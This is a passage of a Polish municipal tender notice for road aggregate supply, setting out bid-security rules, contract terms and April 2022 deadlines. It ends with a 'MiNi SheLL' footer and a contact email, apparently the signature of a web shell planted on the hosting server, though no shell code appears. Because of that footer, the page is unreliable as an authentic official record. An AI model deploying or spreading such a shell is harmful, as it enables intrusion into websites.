2005 0030 0054 0002 z adnotacją: „wadium na przetarg – Dostaw kruszywa na drogi gminne”<br/>5.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:<br/>a)	pieniężnej – dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;<br/>b)	innej niż pieniądz – Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej wraz z ofertą.<br/>6.	Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację . Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7.	W przypadku wadium wniesionego w formie gwarancji wadialnej przez konsorcjum, w dokumencie gwarancji winny być wskazane podmioty należące do konsorcjum lub co najmniej informacja, że zleceniodawca gwarancji składa ofertę w ramach konsorcjum, a fakt ten został zaakceptowany przez gwaranta.<br/>8.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 15 kwietnia 2022 roku do godz. 09:00.<br/>9.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 4 niniejszego rozdziału SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>10.	Zamawiający odrzuca ofertę jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp.;<br/>11 . Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>a) upływu terminu związania ofertą;<br/>b) zawarcia umowy w sprawie zamówienia publicznego;<br/>c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>12. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>a) który wycofał ofertę przed upływem terminu składania ofert;<br/>b) którego oferta została odrzucona;<br/>c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Pozostałe zapisy w SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com